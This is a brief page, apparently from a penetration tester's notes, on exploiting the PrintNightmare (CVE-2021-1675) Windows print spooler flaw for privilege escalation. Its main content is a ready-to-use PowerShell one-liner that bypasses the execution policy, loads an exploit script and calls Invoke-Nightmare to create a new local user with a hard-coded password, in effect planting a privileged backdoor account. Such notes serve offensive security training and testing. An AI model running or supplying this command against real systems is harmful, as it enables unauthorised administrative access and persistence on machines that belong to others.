print nightmare
PrintNightmare Local / Remote Privilege Escalation
no DLL needed:
# no DLLs needed
powershell.exe -exec bypass -Command "& {Import-Module .\CVE-2021-1675.ps1; Invoke-Nightmare -NewUser 'kashz' -NewPassword 'iamkashz@123'}"
Needs DLL to compile
Reference
Last updated
Was this helpful?